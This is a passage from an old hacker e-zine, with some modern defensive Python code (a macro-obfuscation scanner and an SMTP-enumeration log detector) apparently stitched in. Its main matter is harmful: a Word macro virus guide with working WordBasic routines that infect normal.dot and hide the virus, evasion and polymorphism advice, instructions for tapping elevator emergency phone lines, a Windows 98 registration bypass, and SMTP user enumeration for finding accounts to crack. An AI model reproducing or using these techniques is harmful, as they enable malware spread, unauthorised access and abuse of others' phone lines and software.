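    """Map 1-based line number -> findings for every flagged line."""
    report = {}
    for number, line in enumerate(source.splitlines(), 1):
        hits = analyse_line(line)
        if hits:
            report[number] = hits
    return report


# Constructed sample: two shifted lines and one split line in the styles
# the article shows, plus harmless lines, so the scan runs offline.
SAMPLE = """\
Sub MAIN
A$(4) = "NbdspDpqz!gjmf%-hmpcbm%!"
A$(5) = "GjmfTbwfBt!/Gpsnbu!>!2"
A$(4) = "Ma"+"cro"+"Cop"+"y fil"+"e$,g"+"lob"+"al$ "
MsgBox "Document saved"
End Sub
"""

if __name__ == "__main__":
    for number, hits in scan_macro(SAMPLE).items():
        print(f"line {number}: {hits}")
```

On the sample it flags lines 2 and 3 as shift-by-one encodings of MacroCopy and FileSaveAs, and line 4 as a split literal hiding MacroCopy; the harmless MsgBox line is left alone. Because the decision is made on decoded string content rather than on the bare command names, the "+" trick and the line-continuation-with-comments trick from the same section do not help the sample get past it. A few false positives on benign macros that keep command names in strings are the price of that, which is why a real scanner would weight these findings rather than block on them.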
+ Not as simple as before

When writing your macros, write each macro separately, i.e. ToolsMacro and ExtrasMakro, one having German buttons and messages, the other having English buttons :)

[13] - Polymorphism

Traditionally polymorphism was achieved by a method of encryption: the encrypted code was decrypted, then re-encrypted into the new file. Luckily in macro virii there are easier options to tread. In reality, when using polymorphism through encryption you are showing off, or hiding a well known payload, which could just as easily have been encrypted.

There is another method which still uses an encrypted macro which, once decrypted, copies the encrypted macro to a temp file, then edits the temp file, copies it to the final location, and deletes the temp macro.

Instead of encryption, there is a method which avoids the use of encryption, in which a separate macro, whose name is randomised, opens up the non-active macros, removes the existing comments (if any) and writes more random comments. If you have used the encoding method which uses "+" inserted randomly, it is probably possible to randomise them too, for instance:

AutoOpen: once decrypted, this macro copies the other macros (if needed) and randomises the macros in the global template, and the other macros do the same.

If you haven't guessed by now, I see polymorphism as an action that may avoid scanners, but the time taken to write the code, and morph the code, cancels out the usefulness. Stick to the anti-heuristic methods. Basically, only for those who want to prove a point ;)

[14] - Advanced and Weird Techniques

+ dRoKz

Another inspiration by NJ :O. As there is an Organizer copy function in the language, it can be achieved through dialog after dialog.
> SendKeys "%tm%g%c{ESC}"

%t - Tools, m - Macro : selects ToolsMacro
%g : selects the Organizer
%c : copies the macro :0
{esc} : closes all the windows

So this uses the Organizer, but a different version must exist for different languages :(

+ The Virtual Boy Method

Instead of copying itself to the global template, the virus copies itself to the default directory and adds itself to the templates list, and so is a bugger to get rid of, as deleting normal.dot makes no difference hehehe... But it makes it harder to have anti-heuristic capabilities :|

So here we are, the routine to infect normal.dot:

> Sub InfectGlobal
> 'a$ = Startup Path from WinWord.
> a$ = DefaultDir$(8) + "\0.dot"
> 'Where we're going to store our macros
> REM Copy the infected document to this Startup Path.
> If Files$(a$) = "" Then
> 'If it's not there
> ' This is a good way to check if you're infecting a document
> ' or the global!
> CopyFile FileName$(), a$
> 'Copy it
> REM Enable the virus!
> AddAddIn a$
> EndIf
> End Sub

Then, if you're wondering if it was worth it, have a look at this: perfect stealth in macro virii.

> Sub MAIN
> REM Get the position of the infected document.
> b = GetAddInId(DefaultDir$(8) + "\0.dot")
> REM Set ScreenUpdating Off
> ScreenUpdating 0
> If DocMaximize() Then
> DocMaximize
> c = 1
> EndIf
> REM Create a new file to hide the virus macros in the active file.
> FileNew
> REM Remove now the virus document from the ToolsMacro box.
> If b Then AddInState 1, 0
> REM ToolsMacro Options
> Dim d As ToolsMacro
> On Error Resume Next
> Dialog d
> REM Close the document.
> FileClose
> REM Enable now again the virus document.
> If c Then DocMaximize
> If b Then AddInState 1, 1
> REM Show the user the >> clean << Box. ;)
> ToolsMacro d
> End Sub

Trying to replicate this without the special routine is almost impossible heheha :)

:..::..End Of File..::..:

:..::.File 10 Of 14.::..:
:.Elevator Beige Boxing.:
:.:..:.By Holyblob.:..:.:

Introduction
~~~~~~~~~~~~

Eye eye kids.
Welcome to my file on beige boxing in a lift. Yep, believe it or not, you can beige from inside a lift car and I'm gonna tell ya what I know.

First Off
~~~~~~~~~

Well first off, you're gonna have to find a lift with an emergency phone (you can get the picture already :>). The lifts I recommend are shop lifts that only have a few floors, cause they are usually lame enough to have a phone and not an intercom and sometimes, if they're pure stupid, they have a sticker stuck in the phone box telling you to ring security on ext. xxxx or dial 999 in the case of an emergency!! Lifts like these are asking for abuse. You will also find this in office blocks and other large buildings but they are harder to get into and are more likely to be full of pricks in suits. Obviously dinner times are the worst so avoid them like the plague if you're going into larger buildings.

Caution: Just a word of warning, the stainless door to the emergency phone sometimes has an auto alarm and can be *real* loud. This only happens about 1% of the time but just be warned. If you're real unlucky you can get a phone door that's linked into the safety circuit as well as alarmed. This means that the lift will suddenly stop and an alarm will sound if you open the phone door. However, this is very rare and I've only come across it once on an old Express lift. The lift will run once the phone door is closed over again but the alarm needs resetting up in the motor room SO RUN LIKE FUCK or you will be hammered cause a qualified lift engineer needs to be called to go into the motor room and reset the alarm (pretty pricey).

Tricks of the Trade
~~~~~~~~~~~~~~~~~~~

Lifts in shops are mainly for moving stock so they are used pretty often. I find that you are best to keep moving between the ground floor and the top floor but never stopping at the shop floor. If you're in the car, it can still be called to all the floors by people waiting there. This can't really be avoided unless you have a special key.
But here's an excuse you can use if you're in the lift and it starts to go up to the stock room, or somewhere you're not supposed to be:

(The person gives you a funny look or makes a comment)
You say: Tut, I pressed both buttons didn't I? I'm just too impatient. (Then laugh lightly)

This works wonders cause it means that if someone puts a call in on the floor above and you want to go down but press both landing buttons, you get in and press ground but the lift will collect the person above first cause you pressed both buttons. I hope that made sense :>.

But, if you're sat at a floor and someone wants the lift, the doors are gonna open with no warning and you're gonna be stood there with the phone in your hand. Hmmm, nasty. If that happens, just say "Fuck me, I thought I was stuck, I was just about to call for help". And if you're asked what happened, say "The button lit up but went out as I took my finger off". MAKE SURE THAT THE BUTTONS LIT UP IN THE FIRST PLACE!!!

If you've managed to get into a large building, most lifts are paired. Just hop into one of them and get yourself stuck, making sure you can get yourself unstuck. Stay stuck for about 5 or 10 minutes then take the lift for a mooch so it looks like it's still working. When you've had your fun, jump out, go down to ground in the other lift and walk out (a little paranoia never hurt anyone).

Remotely does it
~~~~~~~~~~~~~~~~

This is a nice little way to use the line in the lift from outside the building in the comfort of your car or whatever. Just go to a HAM radio fair and pick up a cordless phone for about a 10 spot and use terminal block to connect it into the cable. If you want it to last longer than a couple of weeks, get a sheet of stainless and make a false back if the box is big enough. Hide your phone behind the false back and screw the emergency phone to the false back.
If you're using an old cordless, the power pack supplies it with 8V AC~ but you can power it with the battery backup or a 9V battery where the power pack goes. This just means that you can't charge the handset cause I think it needs an AC current to do this. You're gonna have to cut the charge unit out of the phone anyway so you can charge the handset up, or find out the rating of the handset battery and make a transformer for your car. Then get an acoustic coupler and use it for net access :) There's no limit to what you can do except the battery life of the base unit so have fun and play safely kids :)

holy

================================================================= | _________ ======================= _________ | | ¬¬¬;¬¬¬;¬ */ __ \ ___ _______ / __ \ | | ¬¬¬¬¬¬¬¬ */ /::\ /*/ / ¬¬ */ \ / /::\ /* ¬ | | ¬;¬¬¬;¬ */ /:::/ /*/ / ¬¬ */ ___ /*/ /:::/ /* ¬¬ | | ¬¬¬¬¬¬ */ /___/ /*/ / ¬¬ */ /::::\ /*/ /___/ /* ¬;¬ | | ¬¬¬;¬ */ __/*/ / ¬¬ */ /:::: / /*/ __/* ¬¬¬¬ | | ¬¬¬¬ */ ___ \ / / ¬¬ */ /:::::/ /*/ ___ \ ¬;¬¬¬ | | ¬;¬ */ /:::\ /*/ / ¬¬ */ /:::::/ /*/ /:::\ /* ¬¬¬¬¬¬ | | ¬¬ */ /::::/ /*/ /_____ */ _____/ /*/ /::::/ /* ¬;¬¬¬;¬ | | ¬ */ /____/ /*/ /*/ /*/ /____/ /* ¬¬¬¬¬¬¬¬ | | */__________/*/________/* _________/*/__________/* ¬;¬¬¬;¬¬¬ | =================================================================

=holyblob@hotmail.com
=ICQ 31783228

:..::..End Of File..::..:

:..::.File 11 Of 14.::..:
:.::.Windows 98 Flaw.::.:
:..::.:.By HitMan.:.::..:

Introduction:
-------------

Want to hear about the flaw I discovered? When I was installing Windows 98 on my computer the other week I noticed a little flaw. So basically here's how it's done. First of all I got the CD off a mate that got it with his brand new computer, and a big problem was that the dumbass forgot to bring over the manual containing the 25 digit code that you need to register Windows 98. The guy also lived too far away to go and get it, so I had to leave my machine on whilst I awaited a phone call with the code.
But after a long time the guy did not call and I was getting very fed up with my machine being on.

<*>--------------------------How It's Done--------------------------<*>

So I clicked not to accept the license agreement; this then sent me crashing out of the install program and into DOS. It then struck me that it asked me for the 25 digit code after it had copied the files onto my hard disk, meaning that there must be some sort of Win32 file system copied onto my computer. Another thought also struck me: Windows 95 put up the prompt below:

**************
Starting Windows 95...
**************

When this prompt came up you could hit F8 (or sometimes F5) and it would bring up a boot menu with several options such as:

**************************SCREEN*************************
*                                                       *
*        Microsoft Windows 95 Startup Menu              *
*        =================================              *
*                                                       *
*   1. Normal                                           *
*   2. Logged (\BOOTLOG.TXT)                            *
*   3. Safe mode                                        *
*   4. Safe mode with Network support                   *
*   5. Step-by-step confirmation                        *
*   6. Command prompt only                              *
*   7. Safe mode command prompt only                    *
*   8. Previous version of MS-DOS                       *
*                                                       *
*   Enter a choice: ?                                   *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*   F5=Safe mode    Shift+F5=Command prompt             *
*                                                       *
**************************SCREEN*************************

So I thought just maybe these would be in Windows 98 as well. However there was a technical hitch: Windows 98 did not bring up a "Starting Windows 98..." prompt, so it basically meant that I would have to time the pressing of the F8 key with the Starting Windows 98 bitmap screen... and hey presto, a boot menu did come up:

**************************SCREEN*************************
*                                                       *
*        Microsoft Windows 95 Startup Menu              *
*        =================================              *
*                                                       *
*   1. Normal                                           *
*   2. Logged (\BOOTLOG.TXT)                            *
*   3. Safe mode                                        *
*   4. Safe mode with Network support                   *
*   5. Step-by-step confirmation                        *
*   6. Command prompt only                              *
*   7. Safe mode command prompt only                    *
*   8. Previous version of MS-DOS                       *
*                                                       *
*   Enter a choice: ?                                   *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*                                                       *
*   F5=Safe mode    Shift+F5=Command prompt             *
*                                                       *
**************************SCREEN*************************

(Not really much difference!)

It gave me the option I needed, Safe Mode. Eventually I selected this and Windows amazingly went slowly into configuring the system and then onto Safe Mode.

<*>----------------------------Next Up------------------------------<*>

So what do you do next? I hear you ask. Click Start Menu|Run and type "REGEDIT" to bring up the registry editor, click on Hkey_Local_Machine and then onto:

SOFTWARE/MICROSOFT/WINDOWS/CURRENT VERSION

Now you will see some entries here and there but the ones you need to edit are:

ProductID
RegisteredOrganization
RegisteredOwner

**********CAUTION**********
This can easily scramble your machine so be careful.
***************************

Double click on each one (one at a time) and change the name of the Registered Owner and Organization to whatever you want. This will do nothing if incorrectly done as it's only a name. Now for the tricky bit: just simply change the Product ID to any 25 digit code such as:

*****************************
12345-67891-23456-78912-34567
*****************************

You can also use a made-up number but just make sure it has the gaps and is just 25 digits and no more. Now click OK to confirm that this is correct. From here you just simply shut down Windows the correct way through the Start Menu and reboot. Windows will then go back into the setup program and continue the installation; all that we have done is told the computer that Windows 98 has already been registered, so it will skip the 25 digit code step and continue from the next step that is in line.

<*>--------------------------Conclusion-----------------------------<*>

So Bill Gates, what happened to your big ass business? Could you not just make a good operating system with all of that money that you have, or are you just a miser!! Cause the house that Bill built has crumbled to its foundation!!
This may be useful as I have done it and there is no reason why you shouldn't try it with any other programs or just simply use it with Windows 98. Send this file to your mates as it will come in useful for future reference. (Please note the Windows 9x screens are not set to the same size!)

__ __ __ ________ ___ ___ ____ ___ __ | | | | | | |__ __| | \ / | / __ \ | \ | | | |_| | | | | | | \/ | / |__| \ | \ | | | _ | | | | | | |\ /| | / ____ \ | |\ \| | | | | | | | | | | | \/ | | / / \ \ | | \ | |__| |__| |__| |__| |__| |__| /__/ \__\ |__| \___|

[-=http://hitman.it.8m.com=-]
[-=vectra500@geocities.com=-]

:..::..End Of File..::..:

:..::.File 12 Of 14.::..:
:..SMTP User Verifying..:
:..::..By NeonBunny.::..:

<*> SMTP User Verifying and Using "User Manager"
+--------------------------------------------+

SMTP vrfy
---------

SMTP is the service that runs on port 25 of most Internet servers; in normal use it's used for receiving e-mail for people using that server. A nice little feature of most SMTP packages is the VRFY command, which some e-mail clients use to check that the user they're sending e-mail to actually exists on that machine and that it won't bounce back as returned mail (this is now built into the RCPT command too). The majority of SMTP daemons will allow you to issue the VRFY command without logging onto their mail server (although it can still be logged, it's not as easy to trace you if you don't send your e-mail address as a login). The syntax of the VRFY command goes something like...

Telnet mail.suckerz.com 25
>Hello this is suckerz.com lame mail system v58.3 at your command, how
>can I help?
VRFY test
>Yup I've got a user called "Test Icle" and his e-mail is
VRFY billg
>Nope I've got no one here called billg

There are two variations of this that I've come across: the first acts as above and will tell you if there is or isn't a user of that name on the server; this is the typical case of most *nix systems running sendmail.
The second variation occurs when the VRFY command has been turned off, and here two things can happen. Either it says that it has every user you ask it for: if this were the case, mail.suckerz.com would report that it had users test, billg and kjsdhfkj. These can be identified by VRFY-ing a few hits on the keyboard. This happens on NT's IIS machines, which instead of removing the command just tell you what you want to hear. The other thing you may come across when the VRFY command has been turned off is a message telling you this and asking you to use the RCPT command instead. To do this simply log on with:

HELO www.microsoft.com

give a fake

MAIL FROM: root@hotmail.com

and then either try RCPT user or RCPT user@server.com and this will tell you if the user exists, although it won't tell you their full name as it does with VRFY.

Some machines require you to log on and can be identified easily as below:

Telnet mail.suckerz.com 25
>Hello this is suckerz.com lame mail system v58.3 at your command, how
>can I help?
VRFY test
>Hey log on to me first, I think you should log on with the user name
>the.hackerbox.mil

So it basically knows roughly who you are anyway; sending the HELO command should please the SMTP service enough to let you VRFY or RCPT users. The HELO command should be in the format of...

HELO 123.123.123.123
or
HELO my.hostname.com

If the machine queries the fake response you may as well give it your IP since it's already logged anyway. While this will let you past the nagging "log on" messages, chances are you'll just meet a variation 2 service once you've hit a few more keys.

User Manager
------------

User Manager simply automates this process by VRFY and RCPT-ing a list of users to give you valid accounts to crack (e.g. stevej) as well as unearthing possible insecure users (e.g. test) or even identifying the machine's O/S (e.g. nobody4).
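From the receiving side, the VRFY and RCPT probing described above shows up in the mail server's log as a burst of "user unknown" rejections from one client, usually with a made-up HELO name and envelope sender. The following is an added example, not part of NeonBunny's article or of User Manager: a Python script that parses Postfix-style smtpd reject lines and reports any client that probed at least a threshold of distinct recipients. The sample log lines are constructed here in Postfix's format with made-up hosts and IPs, and the threshold of five and the user names in the sample are assumptions.

```python
"""Spotting SMTP user enumeration (VRFY / RCPT probing) in mail logs.

Added example, not part of the article or of User Manager: parse
Postfix-style smtpd reject lines and report clients that collected
"user unknown" answers for many distinct recipients.
"""
import re
from collections import defaultdict

# One Postfix "NOQUEUE: reject: RCPT" line; the client IP, rejected
# recipient, HELO name and envelope sender are the fields we keep.
REJECT_LINE = re.compile(
    r"NOQUEUE: reject: RCPT from (?P<host>\S+)\[(?P<ip>[\d.]+)\]: "
    r"(?P<code>\d{3}) \S+ <(?P<rcpt>[^>]*)>: (?P<reason>[^;]*); "
    r"from=<(?P<sender>[^>]*)> to=<[^>]*> proto=\S+ helo=<(?P<helo>[^>]*)>")


def parse_reject(line):
    """Return the named fields of a reject line, or None for other lines."""
    match = REJECT_LINE.search(line)
    return match.groupdict() if match else None


def enumeration_report(lines, threshold=5):
    """Group 'user unknown' rejects per client IP and return the clients
    that probed at least `threshold` distinct recipients (assumed cutoff)."""
    per_ip = defaultdict(lambda: {"rcpts": set(), "helos": set(), "senders": set()})
    for line in lines:
        rec = parse_reject(line)
        if rec is None or "User unknown" not in rec["reason"]:
            continue                      # other rejects are not enumeration
        bucket = per_ip[rec["ip"]]
        bucket["rcpts"].add(rec["rcpt"])
        bucket["helos"].add(rec["helo"])
        bucket["senders"].add(rec["sender"])
    return {
        ip: {"probed": sorted(b["rcpts"]),
             "helos": sorted(b["helos"]),
             "senders": sorted(b["senders"])}
        for ip, b in per_ip.items() if len(b["rcpts"]) >= threshold
    }


def constructed_line(ip, user, helo="www.microsoft.com", sender="root@hotmail.com"):
    """Build a sample log line in Postfix's smtpd format (constructed for the
    example; hosts and addresses are made up, example.com is the local domain)."""
    rcpt = f"{user}@example.com"
    return (f"Jun  1 10:02:17 mx postfix/smtpd[4242]: NOQUEUE: reject: RCPT from "
            f"unknown[{ip}]: 550 5.1.1 <{rcpt}>: Recipient address rejected: "
            f"User unknown in local recipient table; from=<{sender}> to=<{rcpt}> "
            f"proto=ESMTP helo=<{helo}>")


# One client walks a word list the way User Manager would; another just
# mistyped a single address, and one line is not a reject at all.
SAMPLE_LOG = [constructed_line("203.0.113.5", u)
              for u in ("test", "guest", "root", "nobody4", "stevej", "kjsdhfkj")]
SAMPLE_LOG.append(constructed_line("198.51.100.7", "jsmiht",
                                   helo="mail.partner.example",
                                   sender="jane@partner.example"))
SAMPLE_LOG.append("Jun  1 10:03:01 mx postfix/smtpd[4243]: connect from unknown[198.51.100.7]")

if __name__ == "__main__":
    for ip, info in enumeration_report(SAMPLE_LOG).items():
        print(ip, "probed", len(info["probed"]), "recipients, helo", info["helos"])
```

Turning VRFY off (Postfix does this with `disable_vrfy_command = yes`) removes the full-name leak but, as the article notes, RCPT probing still works against any server that rejects unknown recipients at RCPT time, so the complement is per-client error limits (Postfix's `smtpd_soft_error_limit` and `smtpd_hard_error_limit`) and this kind of log review. The single mistyped address from the partner host stays below the threshold and is not reported.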
Using the File menu, load a user list, which will pop up in the top list box; enter the server in the box under the SMTP category and hit Limit. This will create a copy of the user file called c:\temp.tmp which it uses to work from and which is deleted after each scan. The program will then connect to port 25 of the server and begin VRFY/RCPT-ing users; the good users appear in the good list and the bad users in the bad list (obviously). When the process is finished all of the good users are transferred to the top main user list where typical procedures can be performed, e.g. adding users, removing users and saving. There is a user list (created by my fair hands) supplied with the program which has proven to be useful in the past, but the program will work with any user list you may already have. Future developments may include the ability to crack users directly from the user list, i.e. a point and click hacker.

NeonBunny
the_neon_bunny@hotmail.com

:..::..End Of File..::..:

:..::.File 13 Of 14.::..:
:.::.You've Got Mail.::.:
:.::.:..By Readers.:.::.:

___________ _____________________________ ", / / ___ |"'-. / / / / _ \ ___ _____ |!!!!', / / / | | \_| / | |_ __| |!!!!!| / / / | | |\ | () | | | |!!!!!/ / / / | |_| | |___/ |/ |!!!!/ / / / \___/ |!!!/ / / / /| /| __ /| ___ |!!/ / / / | \_/ | / '| | | / _ \ |!/ | / / | | | | (| | | |__ | |__/ |/ \ | _.' | |\/| | \___| \___\ \___\ '-._'..-' |/ |/ (!)

<*> Welcome friends. It's that time again, that time we sort out the flames from the congrats and the questions from the statements. Keep in mind that we really appreciate all correspondence that we receive. The latest ASCII art logo was designed by GPF#2 (again), thanks man :). The e-mails are arranged in the order of the date they were received.

:..Everlasting Support..:

From: "Victor Ocampo"
To: zengus@yahoo.com
Subject: support

Hi! My name's phairygod and I'm a newbie from the Philippines. Can you please send me your previous issues (1&2)? More power!
<*> <*> <*> <*> <*> <*>

Thanks for contacting us. We informed phairygod that we don't have time to send old issues to people. By sending his e-mail to the old address it was clear that he probably saw an old newsgroup post and didn't know the address of our website, which is understandable. Now what we would most like to hear from him (and the rest of you) is what you think of the articles we write (including non-staff members). Send your input as a personal favour to us.

:...Article Submission..:

From: THE MOB BOSS
To: under_p@yahoo.com
Subject: Article Submission

Enclosed find three different articles I have written in the past year. Please read them over and post whichever you like in your ezine. Hope you enjoy them and find them informative. Btw the ethics one is the oldest and the Mob Boss's Guide To Hacking is the latest one.

-The Mob Boss; http://mobboss.dragx.cx

<*> <*> <*> <*> <*> <*>

Thanks Mob Boss. Readers can find The Mob Boss's Guide To Hacking in this month's issue, weighing in at a whopping 30kb.

:.:.:.Some Feedback.:.:.:

From: Firestart
To: zengus@yahoo.com
Subject: Up

Hey, I haven't been online for a while recently because TE disconnected my phone line *grrr* but dogs told me about Up and I just read v1 and v2. It's not bad. HitMan though seems to be a total kiddie; IMO he makes the zine look bad and his articles seem to be more interested in destruction than learning. There's some handy things in the zine for win95 boxes if you're ever bored in school, but I usually don't bother wasting my energy so more *nix related material would be better. CrossFire's 'UNIX Security Holes' article was quite good but it would be better if he found the holes instead of taking them from rootshell, bugtraq etc. Your 'Bouncing your IP' article was good, I can see you put a fair bit of effort into it.
I could have done a better article on Meridian Mail if you wanted, but I might do something on conferences. I don't like being rushed though, and prefer technical things compared to creative things. Just thought I'd say keep it Up <--heh :) You should've mentioned it on the hackers_ireland list, you won't get slagged if it's not lame I'm sure, so you can reply to Hackers_Ireland@onelist.com if you want an extra plug, but I'd say you do well enough with alt.ph.uk. I used to get 100+ hits a day on my site before it went down, just having it in my .sig there :)

PS: bit of a complaint, when you say that the people make the zine, and you want their opinions, why do you ridicule their opinions in the second last section after asking for them?? And another thing: shouldn't the disclaimer be at the start!

--
We will have solar energy as soon as the utility companies solve one technical problem -- how to run a sunbeam through a meter.

<*> <*> <*> <*> <*> <*>

Hello Firestart, good to see you back online. We hope you do decide to write a file on conferences. Don't worry about time, there is no real rush. There has been some minor tweaking to this e-zine over the months. For instance, no more taking the piss out of people who take time out of their lives to e-mail us, as you hoped for. The question about the disclaimer is one asked quite often. The reason it comes at the end is because it is legally binding no matter where we put it, and this way people needn't have legal bullshit shoved in their faces.

:..::..End Of File..::..:

:..::.File 14 Of 14.::..:
:..Disclaimer & The End.:
:.::.:.By Up Staff.:.::.:

<*> Use this information at your own risk. Neither staff or contributors to Underground Periodical, nor the persons providing or hosting Underground Periodical, will assume ANY responsibility for the use, misuse, or abuse of any information provided herein. The previous information is provided for educational purposes ONLY. This information is NOT to be used for any illegal purposes whatsoever.
<*> By reading Underground Periodical you ARE AGREEING to the following terms:

I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Underground Periodical staff, contributors, or anyone that provided this issue or any other issue of Underground Periodical, whether it were official or without notification. I understand that this information is for educational purposes only.

Thanks for reading.

________ __ __ ______ ______ ___ __ ____ |__ __| | | | | | ___| | ___| | \ | | | _ \ | | | |_| | | |__ | |__ | \ | | | | | \ | | | _ | | __| | __| | |\ \| | | | | | | | | | | | | |___ | |___ | | \ | | |_| / |__| |__| |__| |______| |______| |__| \___| |____/

:..::..End Of File..::..: